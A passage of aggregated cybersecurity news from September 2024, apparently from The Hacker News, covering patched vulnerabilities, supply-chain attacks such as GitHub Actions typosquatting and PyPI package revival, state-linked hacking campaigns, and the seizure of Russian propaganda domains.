Flashpoint, in a report published last month, said WWH Club remains operational despite the law enforcement effort, and that "its other administrators are attempting to distance themselves from Kublitskii and Khodyrev."
Khodyrev and Kublitskii "had been living in Miami for the past two years, while secretly continuing to administer WWH Club and its sister dark web marketplaces, forums, and schools," the DoJ said.
If convicted on all counts, they could each face up to 20 years in federal prison. The indictment also requires the forfeiture of Khodyrev's 2023 Mercedes-Benz G63 AMG sport utility vehicle and Kublitskii's 2020 Cadillac CT5 Sport sedan, which are said to have been purchased using proceeds from their criminal enterprise.
SonicWall Urges Users to Patch Critical Firewall Flaw Amid Possible Exploitation
7.9.24 Vulnerebility The Hacker News
SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible.
The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10.
"An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash," SonicWall said in an updated advisory.
With the latest development, the company has revealed that CVE-2024-40766 also impacts the firewall's SSLVPN feature. The issue has been addressed in the below versions -
SOHO (Gen 5 Firewalls) - 5.9.2.14-13o
Gen 6 Firewalls - 6.5.2.8-2n (for SM9800, NSsp 12400, and NSsp 12800) and 6.5.4.15.116n (for other Gen 6 Firewall appliances)
The network security vendor has since updated the bulletin to reflect the possibility that it may have been actively exploited.
"This vulnerability is potentially being exploited in the wild," it added. "Please apply the patch as soon as possible for affected products."
As temporary mitigations, it's recommended to restrict firewall management to trusted sources or disable firewall WAN management from Internet access. For SSLVPN, it's advised to limit access to trusted sources, or disable internet access altogether.
Additional mitigations include enabling multi-factor authentication (MFA) for all SSLVPN users using one-time passwords (OTPs) and recommending customers using GEN5 and GEN6 firewalls with SSLVPN users who have locally managed accounts to immediately update their passwords for preventing unauthorized access.
There are currently no details about how the flaw may have been weaponized in the wild, but Chinese threat actors have, in the past, unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to establish long-term persistence.
GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware
7.9.24 BotNet The Hacker News
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.
The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.
In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.
According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.
These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.
The GeoServer server has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).
Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.
The starting point is a shell script that's responsible for downloading the ELF binaries for ARM, MIPS, and X86 architectures, which, in turn, extracts the C2 server from an encrypted configuration, connects to it, and receives further commands for execution on the compromised device.
This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.
"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.
"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."
The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.
GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code
7.9.24 Vulnerebility The Hacker News
Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.
These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).
Adversaries targeting open-source repositories across platforms have relied on developers making typing errors to initiate software supply chain attacks through PyPI, npm, Maven Central, NuGet, RubyGems, and Crate.
The latest findings from cloud security firm Orca show that even GitHub Actions, a continuous integration and continuous delivery (CI/CD) platform, is not immune from the threat.
"If developers make a typo in their GitHub Action that matches a typosquatter's action, applications could be made to run malicious code without the developer even realizing," security researcher Ofir Yakobi said in a report shared with The Hacker News.
The attack is possible because anyone can publish a GitHub Action by creating a GitHub account with a temporary email account. Given that actions run within the context of a user's repository, a malicious action could be exploited to tamper with the source code, steal secrets, and use it to deliver malware.
All that the technique involves is for the attacker to create organizations and repositories with names that closely resemble popular or widely-used GitHub Actions.
If a user makes inadvertent spelling errors when setting up a GitHub action for their project and that misspelled version has already been created by the adversary, then the user's workflow will run the malicious action as opposed to the intended one.
"Imagine an action that exfiltrates sensitive information or modifies code to introduce subtle bugs or backdoors, potentially affecting all future builds and deployments," Yakobi said.
"In fact, a compromised action can even leverage your GitHub credentials to push malicious changes to other repositories within your organization, amplifying the damage across multiple projects."
Orca said that a search on GitHub revealed as many as 198 files that invoke "action/checkout" or "actons/checkout" instead of "actions/checkout" (note the missing "s" and "i"), putting all those projects at risk.
This form of typosquatting is appealing to threat actors because it's a low-cost, high-impact attack that could result in powerful software supply chain compromises, affecting several downstream customers all at once.
Users are advised to double-check actions and their names to ensure they are referencing the correct GitHub organization, stick to actions from trusted sources, and periodically scan their CI/CD workflows for typosquatting issues.
"This experiment highlights how easy it is for attackers to exploit typosquatting in GitHub Actions and the importance of vigilance and best practices in preventing such attacks," Yakobi said.
"The actual problem is even more concerning because here we are only highlighting what happens in public repositories. The impact on private repositories, where the same typos could be leading to serious security breaches, remains unknown."
Critical Security Flaw Found in LiteSpeed Cache Plugin for WordPress
6.9.24 Vulnerebility The Hacker News
Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts.
The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1.
"The plugin suffers from an unauthenticated account takeover vulnerability which allows any unauthenticated visitor to gain authentication access to any logged-in users and at worst can gain access to an Administrator level role after which malicious plugins could be uploaded and installed," Patchstack researcher Rafie Muhammad said.
The discovery follows an extensive security analysis of the plugin, which previously led to the identification of a critical privilege escalation flaw (CVE-2024-28000, CVSS score: 9.8). LiteSpeed Cache is a popular caching plugin for the WordPress ecosystem with over 5 million active installations.
The new vulnerability stems from the fact that a debug log file named "/wp-content/debug.log" is publicly exposed, which makes it possible for unauthenticated attackers to view potentially sensitive information contained in the file.
This could also include user cookie information present within HTTP response headers, effectively allowing users to log in to a vulnerable site with any session that is actively valid.
The lower severity of the flaw is owing to the prerequisite that the debug feature must be enabled on a WordPress site for it to be successful. Alternatively, it could also affect sites that had activated the debug log feature at some point in the past, but have failed to remove the debug file.
It's important to note that this feature is disabled by default. The patch addresses the problem by moving the log file to a dedicated folder within the LiteSpeed plugin folder ("/wp-content/litespeed/debug/"), randomizing filenames, and dropping the option to log cookies in the file.
Users are advised to check their installations for the presence of the "/wp-content/debug.log" and take steps to purge them if the debugging feature has (or had) been enabled.
It's also recommended to set an .htaccess rule to deny direct access to the log files as malicious actors can still directly access the new log file if they know the new filename by means of a trial-and-error method.
"This vulnerability highlights the critical importance of ensuring the security of performing a debug log process, what data should not be logged, and how the debug log file is managed," Muhammad said.
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code Execution
6.9.24 Vulnerebility The Hacker News
A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows.
The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16.
"An attacker with no valid credentials exploit missing view authorization checks in the web application to execute arbitrary code on the server," Rapid7 security researcher Ryan Emmons said in a new report.
It's worth noting that CVE-2024-45195 is a bypass for a sequence of issues, CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856, which were addressed by the project maintainers over the past few months.
Both CVE-2024-32113 and CVE-2024-38856 have since come under active exploitation in the wild, with the former leveraged to deploy the Mirai botnet malware.
Rapid7 said all three older shortcomings stem from the "ability to desynchronize the controller and view map state," a problem that was never fully remediated in any of the patches.
A consequence of the vulnerability is that it could be abused by attackers to execute code or SQL queries and achieve remote code execution sans authentication.
The latest patch put in place "validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."
Apache OFBiz version 18.12.16 also addresses a critical server-side request forgery (SSRF) vulnerability (CVE-2024-45507, CVSS score: 9.8) that could lead to unauthorized access and system compromise by taking advantage of a specially crafted URL.
Pavel Durov Criticizes Outdated Laws After Arrest Over Telegram Criminal Activity
6.9.24 BigBrothers The Hacker News
Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided.
"If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself," Durov said in a 600-word statement on his Telegram account.
"Using laws from the pre-smartphone era to charge a CEO with crimes committed by third-parties on the platform he manages is a misguided approach."
Durov was charged late last month for enabling various forms of criminal activity on Telegram, including drug trafficking and money laundering, following a probe into an unnamed person's distribution of child sexual abuse material.
He also highlighted the struggles to balance both privacy and security, noting that Telegram is ready to exit markets that aren't compatible with its mission to "protect our users in authoritarian regimes."
Durov also blamed "growing pains that made it easier for criminals to abuse our platform." The popular messaging app recently crossed 950 million monthly active users.
"That's why I made it my personal goal to ensure we significantly improve things in this regard," he said. "We've already started that process internally, and I will share more details on our progress with you very soon."
The company has since updated its FAQ to allow users to report illegal content within private and group chats by flagging it for review using a dedicated "Report" button, a major policy shift and a feature that was previously off-limits.
Durov's statement, however, doesn't delve into the lack of end-to-end encryption (E2EE) protections by default, which users have to explicitly enable in one-to-one chats.
"It is also a 'cloud messenger,' meaning that all messages live on Telegram's servers rather than the user's device," Moxie Marlinspike, creator of the E2EE messaging app Signal, pointed out.
"With one query, the Russian Telegram team can get every message the French president has ever sent or received to his contacts, every message those contacts have ever sent or received to their contacts, every message those contacts' contacts have ever sent or received, etc."
Matthew Green, a security researcher and an associate professor of computer science at Johns Hopkins University, further called out the platform for making it an onerous process that requires at least four clicks on Telegram's iOS app.
"The feature is explicitly not turned on for the vast majority of conversations, and is only available for one-on-one conversations, and never for group chats with more than two people in them," Green said.
"As a kind of a weird bonus, activating end-to-end encryption in Telegram is oddly difficult for non-expert users to actually do. Secret Chats only works if your conversation partner happens to be online when you do this."
Chinese-Speaking Hacker Group Targets Human Rights Studies in Middle East
6.9.24 APT The Hacker News
Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023.
"Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky security researcher Sherif Magdy said.
The Russian cybersecurity vendor said it detected the activity in June 2024 upon discovering a new version of the China Chopper web Shell, a tool shared by many Chinese-speaking threat actors for remote access to compromised servers, on a public web server hosting an open-source content management system (CMS) called Umbraco.
The attack chain is designed to deliver a malware implant named Crowdoor, a variant of the SparrowDoor backdoor documented by ESET back in September 2021. The efforts were ultimately unsuccessful.
Tropic Trooper, also known by the names APT23, Earth Centaur, KeyBoy, and Pirate Panda, is known for its targeting of government, healthcare, transportation, and high-tech industries in Taiwan, Hong Kong, and the Philippines. The Chinese-speaking collective has been assessed to be active since 2011, sharing close ties with another intrusion set tracked as FamousSparrow.
The latest intrusion highlighted by Kaspersky is significant for compiling the China Chopper web shell as a .NET module of Umbraco CMS, with follow-on exploitation leading to the deployment of tools for network scanning, lateral movement, and defense evasion, before launching Crowdoor using DLL side-loading techniques.
It's suspected that the web shells are delivered by exploiting known security vulnerabilities in publicly accessible web applications, such as Adobe ColdFusion (CVE-2023-26360) and Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207).
Crowdoor, first observed in June 2023, also functions as a loader to drop Cobalt Strike and maintain persistence on the infected hosts, while also acting as a backdoor to harvest sensitive information, launch a reverse shell, erase other malware files, and terminate itself.
"When the actor became aware that their backdoors were detected, they tried to upload newer samples to evade detection, thereby increasing the risk of their new set of samples being detected in the near future," Magdy noted.
"The significance of this intrusion lies in the sighting of a Chinese-speaking actor targeting a content management platform that published studies on human rights in the Middle East, specifically focusing on the situation around the Israel-Hamas conflict."
"Our analysis of this intrusion revealed that this entire system was the sole target during the attack, indicating a deliberate focus on this specific content."
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical Issues
6.9.24 Vulnerebility The Hacker News
Veeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution.
The list of shortcomings is below -
CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution.
CVE-2024-42024 (CVSS score: 9.1) - A vulnerability in Veeam ONE that enables an attacker in possession of the Agent service account credentials to perform remote code execution on the underlying machine
CVE-2024-42019 (CVSS score: 9.0) - A vulnerability in Veeam ONE that allows an attacker to access the NTLM hash of the Veeam Reporter Service service account
CVE-2024-38650 (CVSS score: 9.9) - A vulnerability in Veeam Service Provider Console (VPSC) that allows a low privileged attacker to access the NTLM hash of the service account on the server
CVE-2024-39714 (CVSS score: 9.9) - A vulnerability in VPSC that permits a low-privileged user to upload arbitrary files to the server, resulting in remote code execution on the server
In addition, the September 2024 updates address 13 other high-severity flaws that could permit privilege escalation, multi-factor authentication (MFA) bypass, and execute code with elevated permissions.
All the issues have been addressed in the below versions -
Veeam Backup & Replication 12.2 (build 12.2.0.334)
Veeam Agent for Linux 6.2 (build 6.2.0.101)
Veeam ONE v12.2 (build 12.2.0.4093)
Veeam Service Provider Console v8.1 (build 8.1.0.21377)
Veeam Backup for Nutanix AHV Plug-In v12.6.0.632
Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299
With flaws in Veeam software Users becoming a lucrative target for threat actors to serve ransomware, users are advised to update to the latest version as soon as possible to mitigate potential threats.
U.S. Seizes 32 Pro-Russian Propaganda Domains in Major Disinformation Crackdown
5.9.24 BigBrothers The Hacker News
The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions.
Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA), Structura National Technology (Structura), and ANO Dialog for working at the behest of the Russian Presidential Administration.
The goal, it said, is to "covertly spread Russian government propaganda with the aim of reducing international support for Ukraine, bolstering pro-Russian policies and interests, and influencing voters in U.S. and foreign elections, including the U.S. 2024 Presidential Election."
Among the methods Doppelganger used to drive viewership to the cybersquatted media domains encompassed the deployment of "influencers" worldwide, paid social media ads, and the creation of social media profiles posing as U.S. (or other non-Russian) citizens to post comments on social media platforms with links to the domains in an attempt to redirect unsuspecting viewers.
The sites dismantled by the U.S. government were filled with Russian government propaganda created by the Kremlin to reduce international support for Ukraine, bolster pro-Russian policies and interests, and influence voters in the U.S. and other countries.
The complete list of domains, which mimic legitimate news outlets like Der Spiegel, Fox News, Le Monde, and The Washington Post, is as follows -
tribunalukraine.info
rrn.media
ukrlm.info
faz.ltd
spiegel.agency
lemonde.ltd
leparisien.ltd
rbk.media
50statesoflie.media
meisterurian.io
artichoc.io
vip-news.org
acrosstheline.press
mypride.press
truthgate.us
warfareinsider.us
shadowwatch.us
pravda-ua.com
waronfakes.com
holylandherald.com
levinaigre.net
grenzezank.com
lexomnium.com
uschina.online
honeymoney.press
sueddeutsche.co
tagesspiegel.co
bild.work
fox-news.top
fox-news.in
forward.pw, and
washingtonpost.pm
Concurrent with the domain seizures, the Treasury Department sanctioned 10 individuals and two entities for engaging in efforts to influence and undermine confidence in the electoral process.
Specifically, it alleged that executives at RT, Russia's state-funded news media publication, covertly recruited unwitting American influencers into its campaign efforts. It's also said to have used a front company to conceal its own involvement or that of the government.
"At Putin's direction, Russian companies SDA, Structura, and ANO Dialog used cybersquatting, fabricated influencers, and fake profiles to covertly promote AI-generated false narratives on social media," said Deputy Attorney General Lisa Monaco. "Those narratives targeted specific American demographics and regions in a calculated effort to subvert our election."
In conjunction, the DoJ also announced the indictment of two RT employees for funneling $9.7 million to further "hidden" Russian government messaging and disinformation by disseminating thousands of videos via a Tennessee-based content creation firm with an ultimate aim to sow discord among Americans.
Court documents allege that Kostiantyn Kalashnikov, 31, and Elena Afanasyeva, 27, along with other RT employees financed the company's operations to publish English-language videos across TikTok, Instagram, X, and YouTube, racking up millions of views. Kalashnikov and Afanasyeva masqueraded as an outside editing team.
The company is estimated to have posted nearly 2,000 videos since its launch in November 2023, sharing commentary related to immigration, inflation, and other topics related to domestic and foreign policy. The videos have been watched over 16 million times on YouTube alone.
"While the views expressed in the videos are not uniform, most are directed to the publicly stated goals of the Government of Russia and RT — to amplify domestic divisions in the United States," the DoJ said, adding the company "never disclosed to its viewers that it was funded and directed by RT."
The two Russian nationals have been charged with conspiracy to violate the Foreign Agents Registration Act (FARA), which carries a maximum sentence of five years in prison, and conspiracy to commit money laundering, which carries a maximum sentence of 20 years in prison.
Furthermore, the State Department has instituted a new policy to restrict visa issuance to individuals acting on behalf of Kremlin-supported media organizations and using them as cover to engage in clandestine influence activities.
It has also designated Rossiya Segodnya, and subsidiaries RIA Novosti, RT, TV-Novosti, Ruptly, and Sputnik, as foreign missions, requiring them to notify the Department of all personnel working in the country, as well as disclose all real property they hold within U.S. borders.
Taken together, the actions signal a broader push by the U.S. government to clamp down on Russian-backed disinformation operations ahead of November's general election.
The development comes amid revelations that a Chinese influence operation dubbed Spamouflage has ramped up its efforts to influence online discourse around the U.S. elections, creating fake personas across social media platforms to push divisive narratives about sensitive social issues by capitalizing on a polarized information environment.
"These accounts have seeded and amplified content denigrating Democratic and Republican candidates, sowing doubt in the legitimacy of the U.S. electoral process, and spreading divisive narratives about sensitive social issues including gun control, homelessness, drug abuse, racial inequality, and the Israel-Hamas conflict," Graphika said.
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore
5.9.24 Virus The Hacker News
Threat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos.
The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed by French developer Emeric Nasi.
The cybersecurity company said it found artifacts uploaded to VirusTotal from China, Pakistan, Russia, and the U.S. that were all generated by MacroPack and used to deliver various payloads such as Havoc, Brute Ratel, and a new variant of PhantomCore, a remote access trojan (RAT) attributed to a hacktivist group named Head Mare.
"A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines," Talos researcher Vanja Svajcer said.
"These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents."
An important aspect to note here is that the lure themes spanning these documents are varied, ranging from generic topics that instruct users to enable macros to official-looking documents that appear to come from military organizations. This suggests the involvement of distinct threat actors.
Some of the documents have also been observed taking advantage of advanced features offered as part of MacroPack to bypass anti-malware heuristic detections by concealing the malicious functionality using Markov chains to create seemingly meaningful functions and variable names.
The attack chains, observed between May and July 2024, follow a three-step process that entails sending a booby-trapped Office document containing MacroPack VBA code, which then decodes a next-stage payload to ultimately fetch and execute the final malware.
The development is a sign that threat actors are constantly updating tactics in response to disruptions and taking more sophisticated approaches to code execution.
New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading Firm
5.9.24 Virus The Hacker News
The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.
The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.
"KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning," Trend Micro researchers Cedric Pernet and Jaromir Horejsi said in an analysis published Wednesday.
Some of the tools KTLVdoor impersonates include sshd, Java, SQLite, bash, and edr-agent, among others, with the malware distributed in the form of dynamic-link library (.dll) or a shared object (.so).
Perhaps the most unusual aspect of the activity cluster is the discovery of more than 50 command-and-control (C&C) servers, all hosted at Chinese company Alibaba, that have been identified as communicating with variants of the malware, raising the possibility that the infrastructure could be shared with other Chinese threat actors.
Earth Lusca is known to be active since at least 2021, orchestrating cyber attacks against public and private sector entities across Asia, Australia, Europe, and North America. It's assessed to share some tactical overlaps with other intrusion sets tracked as RedHotel and APT27 (aka Budworm, Emissary Panda, and Iron Tiger).
KTLVdoor, the latest addition to the group's malware arsenal, is highly obfuscated and gets its name from the use of a marker called "KTLV" in its configuration file that includes various parameters necessary to meet its functions, including the C&C servers to connect to.
Once initialized, the malware initiates contact with the C&C server on a loop, awaiting further instructions to be executed on the compromised host. The supported commands allow it to download/upload files, enumerate the file system, launch an interactive shell, run shellcode, and initiate scanning using ScanTCP, ScanRDP, DialTLS, ScanPing, and ScanWeb, among others.
That having said, not much is known about how the malware is distributed and if it has been used to target other entities across the world.
"This new tool is used by Earth Lusca, but it might also be shared with other Chinese-speaking threat actors," the researchers noted. "Seeing that all C&C servers were on IP addresses from China-based provider Alibaba, we wonder if the whole appearance of this new malware and the C&C server could not be some early stage of testing new tooling."
Cisco Fixes Two Critical Flaws in Smart Licensing Utility to Prevent Remote Attacks
5.9.24 Vulnerebility The Hacker News
Cisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information.
A brief description of the two vulnerabilities is below -
CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system
CVE-2024-20440 (CVSS score: 9.8) - A vulnerability arising due to an excessively verbose debug log file that an attacker could exploit to access such files by means of a crafted HTTP request and obtain credentials that can be used to access the API
While these shortcomings are not dependent on each other for them to be successful, Cisco notes in its advisory that they "are not exploitable unless Cisco Smart Licensing Utility was started by a user and is actively running."
The flaws, which were discovered during internal security testing, also do not affect Smart Software Manager On-Prem and Smart Software Manager Satellite products.
Users of Cisco Smart License Utility versions 2.0.0, 2.1.0, and 2.2.0 are advised to update to a fixed release. Version 2.3.0 of the software is not susceptible to the bug.
Cisco has also released updates to resolve a command injection vulnerability in its Identity Services Engine (ISE) that could permit an authenticated, local attacker to run arbitrary commands on an underlying operating system and elevate privileges to root.
The flaw, tracked as CVE-2024-20469 (CVSS score: 6.0), requires an attacker to have valid administrator privileges on an affected device.
"This vulnerability is due to insufficient validation of user-supplied input," the company said. "An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root."
It impacts the following versions -
Cisco ISE 3.2 (3.2P7 - Sep 2024)
Cisco ISE 3.3 (3.3P4 - Oct 2024)
The company has also warned that a proof-of-concept (PoC) exploit code is available, although it's not aware of any malicious exploitation of the bug.
North Korean Hackers Targets Job Seekers with Fake FreeConference App
5.9.24 APT The Hacker News
North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.
The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for Windows and Apple macOS to deliver malware.
Contagious Interview, also tracked as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat actor tracked by CrowdStrike under the moniker Famous Chollima.
The attack chains begin with a fictitious job interview, tricking job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware, which in turn delivers InvisibleFerret, a cross-platform Python backdoor that's equipped with remote control, keylogging, and browser stealing capabilities.
Some iterations of BeaverTail, which also functions as an information stealer, have manifested in the form of JavaScript malware, typically distributed via bogus npm packages as part of a purported technical assessment during the interview process.
But that changed in July 2024 when Windows MSI installer and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were discovered in the wild, acting as a conduit to deploy an updated version of BeaverTail.
The latest findings from Group-IB, which has attributed the campaign to the infamous Lazarus Group, suggest that the threat actor is continuing to lean on this specific distribution mechanism, the only difference being that the installer ("FCCCall.msi") mimics FreeConference.com instead of MiroTalk.
It's believed that the phony installer is downloaded from a website named freeconference[.]io, which uses the same registrar as the fictitious mirotalk[.]net website.
"In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others," security researcher Sharmine Low said.
"After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process."
In a sign that the campaign is undergoing active refinement, the threat actors have been observed injecting the malicious JavaScript into both cryptocurrency- and gaming-related repositories. The JavaScript code, for its part, is designed to retrieve the BeaverTail Javascript code from the domain ipcheck[.]cloud or regioncheck[.]net.
It's worth mentioning here that this behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously making use of different propagation vectors.
Another notable change is that BeaverTail is now configured to extract data from more cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing functionality to establish persistence using AnyDesk.
That's not all. BeaverTail's information-stealing features are now realized through a set of Python scripts, collectively called CivetQ, which is capable of harvesting cookies, web browser data, keystrokes, and clipboard content, and delivering more scripts. A total of 74 browser extensions are targeted by the malware.
"The malware is able to steal data from Microsoft Sticky Notes by targeting the application's SQLite database files located at `%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite,` where user notes are stored in an unencrypted format," Low said.
"By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim's Sticky Notes application."
The emergence of CivetQ points to a modularized approach, while also underscoring that the tools are under active development and have been constantly evolving in little increments over the past few months.
"Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities," Low said. "They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms."
The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) warned of North Korean cyber actors' aggressive targeting of the cryptocurrency industry using "well-disguised" social engineering attacks to facilitate cryptocurrency theft.
"North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen," the FBI said in an advisory released Tuesday, stating the threat actors scout prospective victims by reviewing their social media activity on professional networking or employment-related platforms.
"Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies' employees to gain unauthorized access to the company's network."
Android Users Urged to Install Latest Security Updates to Fix Actively Exploited Flaw
5.9.24 OS The Hacker News
Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component.
According to the description of the bug in the NIST National Vulnerability Database (NVD), it concerns a logic error that could lead to local escalation of privileges without requiring any additional execution privileges.
"There are indications that CVE-2024-32896 may be under limited, targeted exploitation," Google said in its Android Security Bulletin for September 2024.
It's worth noting that CVE-2024-32896 was first disclosed in June 2024 as impacting only the Google-owned Pixel lineup.
There are currently no details on how the vulnerability is being exploited in the wild, although GrapheneOS maintainers revealed that CVE-2024-32896 plugs a partial solution for CVE-2024-29748, another Android flaw that has been weaponized by forensic companies.
Google later confirmed to The Hacker News that the impact of CVE-2024-32896 goes beyond Pixel devices to include the entire Android ecosystem and that it's working with original equipment manufacturers (OEMs) to apply the fixes where applicable.
"This vulnerability requires physical access to the device to exploit and interrupts the factory reset process," Google noted at the time. "Additional exploits would be needed to compromise the device."
"We are prioritizing applicable fixes for other Android OEM partners and will roll them out as soon as they are available. As a best security practice, users should always update their devices whenever there are new security updates available."
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival Hijack
5.9.24 Hacking The Hacker News
A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.
It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. These susceptible packages have more than 100,000 downloads or have been active for over six months.
"This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they're removed from PyPI's index by the original owner," JFrog security researchers Andrey Polkovnychenko and Brian Moussalli said in a report shared with The Hacker News.
At its core, the attack hinges on the fact that Python packages published in the PyPI repository may get removed, making available the names of those deleted projects for registration to any other user.
Statistics shared by JFrog show that about 309 packages are removed each month on average. These could happen for any number of reasons: Lack of maintenance (i.e., abandonware), package getting re-published under a different name, or introducing the same functionality into official libraries or built-in APIs.
This also poses a lucrative attack surface that's more effective than typosquatting and which an attacker, using their own accounts, could exploit to publish malicious packages under the same name and a higher version to infect developer environments.
"The technique does not rely on the victim making a mistake when installing the package," the researchers said, pointing out how Revival Hijack can yield better results from the point of view of an adversary. "Updating a 'once safe' package to its latest version is viewed as a safe operation by many users."
While PyPI does have safeguards in place against author impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the counterfeit package as a new version of the original package, wherein the former corresponds to a different package from an entirely different author.
Even more concerning, running the "pip install –upgrade" command replaces the actual package with the phony one without not so much of a warning that the package's author has changed, potentially exposing unwitting developers to a huge software supply chain risk.
